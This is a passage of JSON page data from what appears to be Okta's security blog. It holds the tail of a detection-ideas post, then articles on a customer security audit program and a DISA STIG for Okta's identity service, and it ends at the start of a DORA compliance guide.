\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To contribute new detection ideas, create a GitHub issue and include:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What activity is the idea attempting to detect?\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How can this be leveraged by an adversary?\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Which MITRE ATT&CK technique does it map to?\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The detection query or logic.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Whether you would like to be credited as the author.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Happy hunting!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Brett Winterford contributed to this post.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"}},{"updatedAt":"2026-05-18T01:23:55.880Z","slug":"/articles/2025/05/enhancing-customer-trust-through-a-comprehensive-audit-program","node_locale":"en","date":"2025-05-14T00:00","secAuthor":[{"name":"Matthew Hansen","slug":"/hackers/matthew-hansen","jobTitle":"Regional CSO, Americas 
West","id":"06b9e469-2cb0-5dc7-a6c5-e46c9a367857","bio":{"bio":"<p> Matthew Hansen is a Regional CSO for Okta’s Americas West region. As a leader in security risk management, his accolades include MBA, CISA, and CCSK. Backed by over 15 years of experience in consulting, internal audit, IT governance and risk management, Matthew provides security program support to Okta’s customers. During his downtime, he enjoys travelling the world, experiencing new cultures, and attending Formula 1 races.</p>"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg?w=15&h=15&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg?w=29&h=29&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg?w=58&h=58&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg?w=116&h=116&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg?w=58&h=58&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg?w=15&h=15&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg?w=29&h=29&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg?w=58&h=58&fl=progressive&q=50&fm=jpg 
58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg?w=116&h=116&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#d8d8d8","width":58,"height":58}}}],"title":"Enhancing Customer Trust Through a Comprehensive Audit Program","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"summary":{"summary":"This is the third iteration in our blog series. This blog article explores how the Okta Security Customer Audit further enhances the Customer Trust function, driving even greater transparency and confidence in our security practices to meet our customers' regulatory and compliance requirements."},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\"This is the third iteration in our blog series. In our \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sec.asqula.com/articles/2024/09/unveiling-essence-security-customer-trust/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"italic\"}],\"value\":\"first blog\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\", we introduced Okta’s Security Customer Trust team, highlighting our commitment to transparency and our mission to strengthen security outcomes for Okta and the communities we serve. 
In the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sec.asqula.com/articles/2025/03/empowering-security-with-customer-trust-solutions/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"italic\"}],\"value\":\"second blog\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\", we took a closer look at the tools and solutions that power our Customer Trust efforts.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In this blog, we’ll explore how the Okta Security Customer Audit further enhances the Customer Trust function, driving even greater transparency and confidence in our security practices to meet our customers' regulatory and compliance requirements.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The many benefits of cloud computing come with the challenge of reduced visibility into the day-to-day operations of the growing number of applications in today’s tech stacks. Identity has become the cornerstone of a security program and the new perimeter of technology itself.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"For most customers, reviewing Okta’s generally available documentation meets their requirements. For highly regulated customers, a more detailed audit and more robust documentation may be necessary.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Introducing the program\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-1\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"As organizations increasingly rely on identity platforms, the need for comprehensive security measures has never been greater. 
The growing dependence on external vendors, suppliers, and service providers means businesses face a diverse set of supply chain risks that must be carefully managed to maintain a strong security posture.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The Okta Security Customer Audit program enables highly regulated customers to view the policies, procedures, and evidence that Okta provides to its auditors and meet regulatory requirements for observing control implementation evidence. Our program is carefully designed to enable audits to occur in a way that ensures equality and that does not expose customers to undue risk.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Working with us\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-1\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Through structured assessments, our program provides deep visibility into Okta’s enterprise operations, covering critical areas such as quality control, regulatory compliance, security measures, and performance metrics. These audits are designed to give customers the confidence that Okta’s security practices not only meet, but often exceed, industry standards, empowering them to meet their own regulatory and compliance requirements.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"During an Okta Security Customer Audit, you can expect:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Before an Audit\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Our team will execute a thorough review of the Okta processes, documentation, and controls. 
This may include interviews with key personnel, examination of various records, and observation of operational practices. Our audit team possesses expertise in relevant areas such as quality assurance, compliance, and information security across various industries and regions.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"During an Audit, Pooled edition\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Following the methodical mapping of regulatory controls, we introduced our program's capabilities to a pooled audit function. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Last December, we piloted our Okta Security Pooled Audit program \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\"(more on this in a future blog)\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\", which addressed the control requirements defined by the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sec.asqula.com/articles/2025/05/a-guide-to-dora-compliance-with-okta/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Digital Operational Resilience Act (DORA)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". Our pooled audit equipped dozens of our EMEA/UK financial services customers with an open-door look into our security program, much like we would share with our own third-party audit functions. Ultimately, we demonstrated Okta’s controls meeting customer and regulator requirements, in addition to fostering community. 
Our attendees had peer-to-peer opportunities to discuss similar industry-related challenges they face in their respective organizations regarding compliance regulations.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"After the Audit\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Post-audit closing activities are crucial for the program's effectiveness. These activities involve following up on the implementation of corrective actions and verifying that Okta has made the necessary improvements to keep both Okta and our customers secure. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"More on our Audit programs\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"While we’re not subject to every global regulation, we will work closely with our customers to understand their requirements, support them in their efforts to achieve and maintain compliance, and reinforce trust in Okta. \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"For more information on accessing Okta's Security Trust Center, visit our \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://support.asqula.com/help/s/article/accessing-okta-s-security-trust-center?language=en_US\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta Docs\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\".\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Later this month, we’re expanding our pooled audit program to help Okta’s Australian customers address new regulations under Australian Prudential Regulation Authority (APRA) CPS 230, and the existing CPS 234 requirements, which will follow the same program structure. 
To learn more about our audit programs and how to get involved, contact your account team.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"}},{"updatedAt":"2025-05-09T15:00:07.712Z","slug":"/articles/2025/05/oktas-new-stig","node_locale":"en","date":"2025-05-09T00:00","secAuthor":[{"name":"Rob Gil","slug":"/hackers/rob-gil","jobTitle":"Sr. Director, Federal Architecture","id":"96970804-8b58-5b39-9146-0928bc8a399b","bio":{"bio":"<p>Rob Gil is a Sr. Director, Federal Architecture at Okta and is responsible for leading the Public Sector technology initiatives for FedRAMP, DoD Impact Levels, and StateRAMP. Prior to Okta, Rob worked on the JEDI project for the DoD Cloud Computing Program Office as well as leading the Cloud SecOps team at Elastic. Rob’s work at Elastic helped set the foundations for the Elastic SIEM as an initial core contributor to the Elastic Common Schema and first version of the Elastic SIEM. Before Elastic, Rob led operations and engineering teams at Salesforce and a variety of financial institutions. When not working, Rob enjoys the quiet life on his homestead and dabbling with tech. 
</p>"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg?w=15&h=15&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg?w=29&h=29&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg?w=58&h=58&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg?w=116&h=116&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg?w=58&h=58&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg?w=15&h=15&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg?w=29&h=29&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg?w=58&h=58&fl=progressive&q=50&fm=jpg 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg?w=116&h=116&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#e8e8e8","width":58,"height":58}}},{"name":"Naveed Mirza","slug":"/hackers/naveed-mirza","jobTitle":"Senior Solutions Architect","id":"110196ee-f45a-5ada-b02c-40d591fa732c","bio":{"bio":"<p> Naveed is a Senior Solutions Architect at Okta, focusing on the DoD and Federal customer base. 
He has worked in cybersecurity since leaving the US Navy in the late 1990s. Before coming to Okta, Naveed was a consultant for several DoD customers, and he continues to offer advice via active participation in the DoD community. He grew up in Stafford, Virginia, and upon returning from active duty, took up residence there once more. In his free time, he enjoys beer brewing, gaming, and the occasional date night with his wife.</p>"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg?w=15&h=16&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg?w=29&h=32&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg?w=58&h=63&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg?w=116&h=126&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg?w=58&h=63&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg?w=15&h=16&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg?w=29&h=32&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg?w=58&h=63&fl=progressive&q=50&fm=jpg 
58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg?w=116&h=126&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#c8d8d8","width":58,"height":63}}},{"name":"Brandon Iske","slug":"/hackers/brandon-iske","jobTitle":"Principal Solutions Architect","id":"76ecc069-7d69-5aa8-a81d-cf72595f683e","bio":{"bio":"<p> Brandon Iske is a Principal Solutions Architect focused on enabling Federal Government and strategic accounts at Okta. He is passionate about strengthening our nation’s cybersecurity and user experience through Identity-focused IT modernization and cyber best practices. Before joining Okta, Brandon worked for over a decade in government public service to deliver and secure joint Department of Defense enterprise capabilities in endpoint security, mobile management, identity and access management, and Zero Trust architecture at the Defense Information Systems Agency. He earned a Bachelor’s Degree in Computer Science from the University of Nebraska at Omaha. 
He is also a National Science Foundation CyberCorps Scholarship for Service Alumnus and an Okta Certified Professional.</p>"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg?w=15&h=15&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg?w=29&h=29&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg?w=58&h=58&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg?w=116&h=116&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg?w=58&h=58&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg?w=15&h=15&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg?w=29&h=29&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg?w=58&h=58&fl=progressive&q=50&fm=jpg 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg?w=116&h=116&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#b8c8c8","width":58,"height":58}}}],"title":"Okta's new Security Technical Implementation Guide 
(STIG)","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"summary":{"summary":"Okta recently announced our partnership with DISA, which has resulted in the release of the Okta Identity as a Service (IDaaS) Security Technical Implementation Guide (STIG) in an effort to secure baselines for the industry."},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In cybersecurity, identity is the first line of defense. As the number of applications and systems increases, the fatigue of the cyber workforce increases in parallel. Exacerbating this is the increased responsibility on customers to create secure baselines where none exist.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Securing Baselines\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In an effort to create secure baselines, organizations like the Defense Information Systems Agency (DISA) have built publicly available guidance in the form of DISA Security Technical Implementation Guides (STIG). STIGs and Security Requirements Guides for the Department of Defense (DOD) information technology systems are mandated by DODI 8500.01 and provide benefits across the industry. This guidance bridges the gap between the National Institute of Standards and Technology (NIST) Special Publication 800-53 and Risk Management Framework (RMF). 
STIGs offer significant benefits for improving IT system security, compliance and resilience.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta and DISA\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta recently announced \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://public.cyber.mil/announcement/disa-releases-the-okta-idaas-security-technical-implementation-guide/\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"our partnership with DISA\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", which has resulted in the release of the \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Okta Identity as a Service (IDaaS) Security Technical Implementation Guide (STIG). \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"While this STIG is specific to Okta platforms, the integrations and hardening guidance are standards-based and can be used on any identity platform.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"As an industry leader in Identity and Access Management (IAM), Okta is interoperable with various identity platforms and applications, which makes the Okta STIG easier to reference as a basis for other similar products in today's technological marketplace.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"As the \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"first identity vendor to provide this level of configuration guidance\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\", we look forward to continuing our relationship with DISA. 
By raising the bar for the industry, we're helping create the strongest and most secure guidance possible for securing not only the Okta platforms — but everything they connect to.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Call to Action\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"With the release of this guidance, we encourage all of our customers to evaluate their Okta orgs against the STIG. While some checks such as \\\"banner notifications\\\" may not apply to commercial entities, the remainder of the checks include recommendations for the utmost secure configuration of the Okta platforms.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The Okta Identity as a Service (IDaaS) Security Technical Implementation Guide (STIG) is available to download at \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://public.cyber.mil/stigs/downloads/\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"https://public.cyber.mil/stigs/downloads/\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", search for Okta. If you have feedback on the STIG, please contact fedramp@asqula.com.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"}},{"updatedAt":"2025-06-19T20:58:42.206Z","slug":"/articles/2025/05/a-guide-to-dora-compliance-with-okta","node_locale":"en","date":"2025-05-07T00:00","secAuthor":[{"name":" Aimi Mcilwraith","slug":"/hackers/aimi-mcilwraith","jobTitle":"Senior Security Analyst","id":"9b70b212-4a99-533c-89ce-b03712fa8a5e","bio":{"bio":"<p>Aimi Mcilwraith is a Senior Security Analyst at Okta. The Customer Assurance team within Security Trust & Culture supports Okta’s growing customer base with inquiries pertaining to security and compliance. 
Backed by over a decade of Security experience working in public and private sector organizations, Aimi has honed a deep understanding of security practices and risk management. CCSK and NIST CSF-certified, she leverages her knowledge and commitment to excellence in safeguarding digital environments to support customers globally from the EMEA region. In her downtime, Aimi enjoys reading and attending concerts.  </p>"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/76IKtgl63E2LTBz7eNiiTr/20a6d30a4e00103bcf721f634afe2754/Aimi_Mcilwraith.png?w=15&h=15&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/76IKtgl63E2LTBz7eNiiTr/20a6d30a4e00103bcf721f634afe2754/Aimi_Mcilwraith.png?w=29&h=29&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/76IKtgl63E2LTBz7eNiiTr/20a6d30a4e00103bcf721f634afe2754/Aimi_Mcilwraith.png?w=58&h=58&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/76IKtgl63E2LTBz7eNiiTr/20a6d30a4e00103bcf721f634afe2754/Aimi_Mcilwraith.png?w=116&h=116&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/76IKtgl63E2LTBz7eNiiTr/20a6d30a4e00103bcf721f634afe2754/Aimi_Mcilwraith.png?w=58&h=58&q=50&fm=png","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/76IKtgl63E2LTBz7eNiiTr/20a6d30a4e00103bcf721f634afe2754/Aimi_Mcilwraith.png?w=15&h=15&q=50&fm=png 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/76IKtgl63E2LTBz7eNiiTr/20a6d30a4e00103bcf721f634afe2754/Aimi_Mcilwraith.png?w=29&h=29&q=50&fm=png 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/76IKtgl63E2LTBz7eNiiTr/20a6d30a4e00103bcf721f634afe2754/Aimi_Mcilwraith.png?w=58&h=58&q=50&fm=png 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/76IKtgl63E2LTBz7eNiiTr/20a6d30a4e00103bcf721f634afe2754/Aimi_Mcilwraith.png?w=116&h=116&q=50&fm=png 116w","sizes":"(min-width: 58px) 58px, 
100vw"}},"layout":"constrained","backgroundColor":"#e8a898","width":58,"height":58}}}],"title":"A Guide to DORA Compliance with Okta","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"summary":{"summary":"This blog article provides a brief overview of the DORA regulation, outlines how Okta can support compliance adherence, and introduces our new Factsheet, a helpful resource for satisfying DORA's regulated requirements."},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This blog article provides a brief overview of the DORA regulation, outlines how Okta can support compliance adherence, and introduces our new Factsheet, a helpful resource for satisfying DORA's regulated requirements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is DORA?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.eiopa.europa.eu/digital-operational-resilience-act-dora_en\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Digital Operational Resilience Act\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (Regulation (EU) 2022/2554), most commonly known as DORA, became applicable in January 2025 and addresses a critical gap in EU financial regulation.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"With the introduction of DORA, financial institutions must 